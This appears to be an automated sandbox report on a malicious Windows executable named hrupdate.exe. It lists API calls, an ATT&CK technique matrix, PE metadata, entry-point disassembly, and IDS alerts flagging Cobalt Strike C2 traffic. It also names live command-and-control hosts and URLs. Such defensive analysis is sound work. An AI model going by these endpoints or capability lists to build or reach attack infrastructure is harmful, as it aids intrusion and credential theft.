Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04699839 _malloc,_memset,_strncmp,GetCurrentDirectoryA,FindFirstFileA,GetLastError,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,0_2_04699839
Source: hrupdate.exe, 00000000.00000003.3567988184.0000000002DDA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW1-
Source: hrupdate.exe, 00000000.00000002.3897221347.0000000002DBC000.00000004.00000800.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.3567988184.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.3867908182.0000000002DBC000.00000004.00000800.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000002.3896833882.0000000000B8B000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.3588982597.0000000002DC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: hrupdate.exe, 00000000.00000002.3896833882.0000000000B75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\hrupdate.exeAPI call chain: ExitProcess graph end nodegraph_0-18161
Source: C:\Users\user\Desktop\hrupdate.exeAPI call chain: ExitProcess graph end nodegraph_0-18531
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_046AE81B LdrInitializeThunk,0_2_046AE81B
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_0067364F IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0067364F
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F3BE95 mov eax, dword ptr fs:[00000030h]0_3_00F3BE95
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F3CA68 mov eax, dword ptr fs:[00000030h]0_3_00F3CA68
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_046BFE9D VirtualQuery,GetModuleFileNameW,GetPdbDll,GetProcAddress,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,0_2_046BFE9D
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_00673084 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00673084
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_006737E2 SetUnhandledExceptionFilter,0_2_006737E2
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_046B2CCF _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_046B2CCF
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_046B655E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_046B655E
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_046A43CB LogonUserA,GetLastError,ImpersonateLoggedOnUser,GetLastError,0_2_046A43CB
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_046A459B GetCurrentProcessId,AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_046A459B
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_0067390E cpuid 0_2_0067390E
Source: C:\Users\user\Desktop\hrupdate.exeCode function: GetLocaleInfoA,0_2_046BC0B0
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_046988A5 CreateNamedPipeA,0_2_046988A5
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_0067353E GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_0067353E
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_00671480 WSAStartup,GetUserNameW,wcstombs_s,memset,strncat,WSACleanup,LoadStringW,LoadStringW,LoadStringW,LoadIconW,LoadIconW,LoadCursorW,LoadIconW,RegisterClassExW,CreateWindowExW,UpdateWindow,LoadIconW,lstrcpyW,Shell_NotifyIconW,LoadAcceleratorsW,GetMessageW,GetMessageW,DialogBoxParamW,TranslateAcceleratorW,TranslateMessage,DispatchMessageW,GetMessageW,terminate,0_2_00671480
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_0469CCA3 GetUserNameA,GetComputerNameA,GetModuleFileNameA,_strrchr,GetVersionExA,__snprintf,0_2_0469CCA3
Source: C:\Users\user\Desktop\hrupdate.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Remote Access Functionality

barindex
Source: Yara matchFile source: 00000000.00000002.3897221347.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.3290133127.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.3290059419.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: hrupdate.exe PID: 6664, type: MEMORYSTR
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_0469D481 htonl,htons,socket,closesocket,bind,ioctlsocket,0_2_0469D481
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_046A4FA4 socket,closesocket,htons,bind,listen,0_2_046A4FA4
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_0469D39F socket,htons,ioctlsocket,closesocket,bind,listen,0_2_0469D39F
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 2 Command and Scripting Interpreter | 2 Valid Accounts | 2 Valid Accounts | 2 Valid Accounts | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 21 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 3 Native API | 1 DLL Side-Loading | 21 Access Token Manipulation | 1 Virtualization/Sandbox Evasion | LSASS Memory | 131 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 4 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Process Injection | 21 Access Token Manipulation | Security Account Manager | 1 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 1 Process Injection | NTDS | 1 Process Discovery | Distributed Component Object Model | Input Capture | 114 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 24 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Source | Detection | Scanner
hrupdate.exe | 3% | ReversingLabs
hrupdate.exe | 100% | Joe Sandbox ML
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ec2-3-79-209-76.eu-central-1.compute.amazonaws.com | 3.79.209.76 | true | true | - | unknown
www.hrtraining.ro | unknown | unknown | true | - | unknown

Name | Malicious | Antivirus Detection | Reputation
https://www.flntp.ro/rss/portallogin-gettask.html | true | - | unknown
www.hrtraining.ro | true | - | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
3.79.209.76 | ec2-3-79-209-76.eu-central-1.compute.amazonaws.com | United States | 16509 | AMAZON-02US | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1578569
Start date and time: 2024-12-19 22:44:49 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 49s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 4
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: hrupdate.exe
Detection: MAL
Classification: mal96.troj.evad.winEXE@1/0@2/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 93%
• Number of executed functions: 32
• Number of non-executed functions: 103
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps longer than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with a delay of 100000000ms or more are ignored
• Processes excluded from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• IPs excluded from analysis (whitelisted): 13.107.246.63, 52.149.20.212
• Domains excluded from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: hrupdate.exe
Match: AMAZON-02US
Associated Sample Name / URL | Detection | Threat Name | Context
https://www.canva.com/design/DAGZxEJMIA0/pFi0b1a1Y78oAGDuII8Hjg/view?utm_content=DAGZxEJMIA0&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=hdcdec8ed4a | malicious | HTMLPhisher | 75.2.57.54
https://gateway.lighthouse.storage/ipfs/bafkreigjxudfsi54f5pliswxztgujxgpdhe4uyrezdbg5avbtrclxrxc6i | malicious | HTMLPhisher | 13.227.8.71
https://launch.app/prolandtitle | malicious | HTMLPhisher | 76.76.21.21
Employee_Letter.PDFuJPefyDW1j.url | malicious | Unknown | 13.227.8.47
mipsel.nn.elf | malicious | Mirai, Okiru | 3.165.3.192
6CWcISKhf1.msi | malicious | AteraAgent | 13.232.67.198
https://go.eu.sparkpostmail1.com/f/a/lgobNkIfvQXGgmbryxpFvQ~~/AAGCxAA~/RgRpPCorP0QoaHR0cHM6Ly9iZXJhemVsLmNvbS93ZWxsbmVzcy9zb3V0aC9pbmRleFcFc3BjZXVCCmdVK6VZZ3GvOmFSFmV0aGFubG9nYW40M0BnbWFpbC5jb21YBAAAAAE~#a3RhdHJvZUBob3VzaW5nY2VudGVyLmNvbQ== | malicious | HTMLPhisher | 13.227.8.65
spc.elf | malicious | Mirai, Moobot | 18.217.199.157
x86_64.elf | malicious | Mirai, Moobot | 65.3.229.89

Match: 37f463bf4616ecd445d4a1937da06e19
Associated Sample Name / URL | Detection | Threat Name | Context
billys.exe | malicious | Meduza Stealer | 3.79.209.76
ruppert.exe | malicious | CredGrabber, Meduza Stealer | 3.79.209.76
file.exe | malicious | ScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar | 3.79.209.76
2JSGOlbNym.dll | malicious | Unknown | 3.79.209.76
4hSuRTwnWJ.dll | malicious | Unknown | 3.79.209.76
QCTYoyX422.dll | malicious | Unknown | 3.79.209.76
PURCHASE ORDER TRC-090971819130-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 3.79.209.76
PAYMENT ADVICE 750013-1012449943-81347-pdf.exe | malicious | GuLoader, MassLogger RAT | 3.79.209.76
INVOICE-0098.pdf ... .lnk.lnk.d.lnk | malicious | Unknown | 3.79.209.76
                                    No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 4.407559158089781
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: hrupdate.exe
File size: 244'224 bytes
MD5: 03b14e9338a1c9e5551f9450207f6d84
SHA1: f1a816c47637c8d4d0b52b333cba11b0d7571fcb
SHA256: 7a4d2b3e83220df7a55944a838bb9ebaa8f8463cff62fa92ae10e640eeb4e498
SHA512: 2c51fc5272e24ef43d770c7a6ac30252bcd408878405d2f1cf63327a05e497fd6e5fabc54a328ece7c4abe2ee4b1fcd8e9c03cb03bd6d5f0b2d7d6c87848b946
SSDEEP: 1536:MUth9KcBb/v5D8gCHqoPXDO4YcPJnWQyz9999Uh:MUtXNVD8gCPD3L
TLSH: 0C343B43569D7C92CC3C1B38237B97DB832EBE7578C5E08EB9803E9692BD0923512795
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<...].V.].V.].V.%$V.].V.5.W.].V.5.W.].V.5.W.].V.5.W.].V...W.].V.].V:].V$4.W.].V$4HV.].V.] V.].V$4.W.].VRich.].V........PE..L..
Icon Hash: 17170f6d2b2d2d13
Entrypoint: 0x40307a
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x672B2266 [Wed Nov 6 08:01:42 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 40fa9cd20812bab5129ef85091bfbdac
                                    Instruction
                                    call 00007F1F1D259D41h
                                    jmp 00007F1F1D2596AFh
                                    push ebp
                                    mov ebp, esp
                                    push 00000000h
                                    call dword ptr [00404038h]
                                    push dword ptr [ebp+08h]
                                    call dword ptr [0040406Ch]
                                    push C0000409h
                                    call dword ptr [00404034h]
                                    push eax
                                    call dword ptr [0040403Ch]
                                    pop ebp
                                    ret
                                    push ebp
                                    mov ebp, esp
                                    sub esp, 00000324h
                                    push 00000017h
                                    call 00007F1F1D25A2EAh
                                    test eax, eax
                                    je 00007F1F1D259837h
                                    push 00000002h
                                    pop ecx
                                    int 29h
                                    mov dword ptr [00406330h], eax
                                    mov dword ptr [0040632Ch], ecx
                                    mov dword ptr [00406328h], edx
                                    mov dword ptr [00406324h], ebx
                                    mov dword ptr [00406320h], esi
                                    mov dword ptr [0040631Ch], edi
                                    mov word ptr [00406348h], ss
                                    mov word ptr [0040633Ch], cs
                                    mov word ptr [00406318h], ds
                                    mov word ptr [00406314h], es
                                    mov word ptr [00406310h], fs
                                    mov word ptr [0040630Ch], gs
                                    pushfd
                                    pop dword ptr [00406340h]
                                    mov eax, dword ptr [ebp+00h]
                                    mov dword ptr [00406334h], eax
                                    mov eax, dword ptr [ebp+04h]
                                    mov dword ptr [00406338h], eax
                                    lea eax, dword ptr [ebp+08h]
                                    mov dword ptr [00406344h], eax
                                    mov eax, dword ptr [ebp-00000324h]
                                    mov dword ptr [00406280h], 00010001h
                                    Programming Language:
                                    • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x4d0c | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x7000 | 0x361b8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x3e000 | 0x400 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x4450 | 0x70 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x44c0 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x4000 | 0x230 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2ecb | 0x3000 | 5d06f4206746907c833a2481f65088c1 | False | 0.5750325520833334 | COM executable for DOS | 6.300274659901053 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x4000 | 0x1a08 | 0x1c00 | 1e97f3d49e555f25c36fe5d37cfead01 | False | 0.39620535714285715 | data | 4.65454105213308 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x6000 | 0x738 | 0x400 | 2ceacc7ad5a855df52932a54a33adc4d | False | 0.259765625 | data | 3.3218316032948274 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x7000 | 0x361b8 | 0x36200 | 74bdbba1f539597c017848daa85523b5 | False | 0.14270893475750576 | data | 4.0626831582612635 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x3e000 | 0x400 | 0x400 | b6b1b20025ba3ae165aea709cabb8ef5 | False | 0.912109375 | data | 6.464420599581639 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_BITMAP | 0x1e170 | 0x1ed70 | Device independent bitmap graphic, 205 x 205 x 24, image size 126280, resolution 2835 x 2835 px/m | English | United States | 0.1544094363521216
RT_ICON | 0x75e0 | 0x115a | PNG image data, 256 x 256, 8-bit colormap, non-interlaced | English | United States | 0.33340837460603334
RT_ICON | 0x8740 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.09408315565031983
RT_ICON | 0x95e8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.11507220216606498
RT_ICON | 0x9e90 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.12427745664739884
RT_ICON | 0xa3f8 | 0x90b | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.791792656587473
RT_ICON | 0xad08 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.03235710911667454
RT_ICON | 0xef30 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.04595435684647303
RT_ICON | 0x114d8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.075046904315197
RT_ICON | 0x12580 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.15070921985815602
RT_ICON | 0x12a70 | 0x115a | PNG image data, 256 x 256, 8-bit colormap, non-interlaced | English | United States | 0.33340837460603334
RT_ICON | 0x13bd0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.09408315565031983
RT_ICON | 0x14a78 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.11507220216606498
RT_ICON | 0x15320 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.12427745664739884
RT_ICON | 0x15888 | 0x90b | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.791792656587473
RT_ICON | 0x16198 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.03235710911667454
RT_ICON | 0x1a3c0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.04595435684647303
RT_ICON | 0x1c968 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.075046904315197
RT_ICON | 0x1da10 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.15070921985815602
RT_MENU | 0x1df00 | 0x4a | data | English | United States | 0.8648648648648649
RT_DIALOG | 0x1df60 | 0x100 | data | English | United States | 0.62890625
RT_DIALOG | 0x1e060 | 0x10c | data | English | United States | 0.6492537313432836
RT_STRING | 0x3cee0 | 0x50 | data | English | United States | 0.75
RT_ACCELERATOR | 0x1df50 | 0x10 | data | English | United States | 1.25
RT_GROUP_ICON | 0x129e8 | 0x84 | data | English | United States | 0.6590909090909091
RT_GROUP_ICON | 0x1de78 | 0x84 | data | English | United States | 0.6515151515151515
RT_MANIFEST | 0x3cf30 | 0x286 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5479876160990712
DLL | Imports
KERNEL32.dll | FlsSetValue, CreateFileA, CloseHandle, K32GetModuleInformation, GetModuleHandleA, GetConsoleWindow, lstrcpyW, CreateFileMappingW, MapViewOfFile, GetCurrentProcess, SetUnhandledExceptionFilter, TerminateProcess, FreeLibrary, VirtualAlloc, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, UnhandledExceptionFilter, FlsAlloc, VirtualProtect
USER32.dll | ShowWindow, LoadStringW, RegisterClassExW, GetMessageW, DefWindowProcW, DestroyWindow, CreateWindowExW, SendMessageW, EndDialog, DispatchMessageW, EndPaint, BeginPaint, SetTimer, TranslateAcceleratorW, TranslateMessage, LoadIconW, LoadCursorW, GetDlgItem, UpdateWindow, KillTimer, PostQuitMessage, DialogBoxParamW, LoadAcceleratorsW
ADVAPI32.dll | GetUserNameW
SHELL32.dll | Shell_NotifyIconW
MSVCP140.dll | _Mtx_destroy, _Mtx_unlock, _Cnd_init, _Query_perf_frequency, _Xtime_get_ticks, _Thrd_detach, _Query_perf_counter, _Thrd_start, _Mtx_init, _Cnd_wait, _Thrd_sleep, _Cnd_destroy, _Cnd_signal, _Cnd_do_broadcast_at_thread_exit, ?_Throw_Cpp_error@std@@YAXH@Z, ?_Xout_of_range@std@@YAXPBD@Z, ?_Xbad_function_call@std@@YAXXZ, ?_Throw_C_error@std@@YAXH@Z, ?_Xlength_error@std@@YAXPBD@Z, _Mtx_lock
WS2_32.dll | WSACleanup, recv, htons, gethostbyname, WSAStartup, inet_addr, gethostbyaddr, send, socket, connect, closesocket
CRYPT32.dll | CertEnumSystemStore
VCRUNTIME140.dll | __CxxFrameHandler3, __std_terminate, strstr, __std_exception_copy, memchr, _CxxThrowException, memset, _except_handler4_common, memcpy, __std_exception_destroy, memmove
api-ms-win-crt-heap-l1-1-0.dll | realloc, malloc, _callnewh, free, _set_new_mode
api-ms-win-crt-string-l1-1-0.dll | strncat, strncpy
api-ms-win-crt-runtime-l1-1-0.dll | _configure_wide_argv, _register_onexit_function, _cexit, _crt_atexit, _controlfp_s, _c_exit, _set_app_type, _seh_filter_exe, _exit, exit, _register_thread_local_exe_atexit_callback, _initterm, _initterm_e, _invalid_parameter_noinfo_noreturn, _get_wide_winmain_command_line, _initialize_onexit_table, _initialize_wide_environment, terminate
api-ms-win-crt-stdio-l1-1-0.dll | __stdio_common_vsprintf, _set_fmode, __p__commode
api-ms-win-crt-convert-l1-1-0.dll | wcstombs_s
api-ms-win-crt-math-l1-1-0.dll | __setusermatherr
api-ms-win-crt-locale-l1-1-0.dll | _configthreadlocale
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-19T22:45:43.281672+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49704 | 3.79.209.76 | 80 | TCP
2024-12-19T22:47:44.887661+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49938 | 3.79.209.76 | 80 | TCP
2024-12-19T22:47:48.218861+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.5 | 49946 | TCP
2024-12-19T22:48:03.798139+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.5 | 49979 | TCP
2024-12-19T22:48:15.611444+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.5 | 49980 | TCP
2024-12-19T22:48:29.363989+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.5 | 49981 | TCP
2024-12-19T22:48:46.486255+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.5 | 49982 | TCP
                                    Dec 19, 2024 22:47:45.084161043 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.084223986 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.092382908 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.092457056 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.092514992 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.100749016 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.100876093 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.100930929 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.109147072 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.109258890 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.109308004 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.117803097 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.117940903 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.117993116 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.126063108 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.126188993 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.126240015 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.134381056 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.134538889 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.134584904 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.142792940 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.142898083 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.142950058 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.151216030 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.151361942 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.151411057 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.183630943 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.183698893 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.183737993 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.199599028 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.199687958 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.199733973 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.271909952 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.272066116 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.272119045 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.274226904 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.274322033 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.274374008 CET4993880192.168.2.53.79.209.76
                                    Dec 19, 2024 22:47:45.277928114 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.278059006 CET80499383.79.209.76192.168.2.5
                                    Dec 19, 2024 22:47:45.278106928 CET4993880192.168.2.53.79.209.76
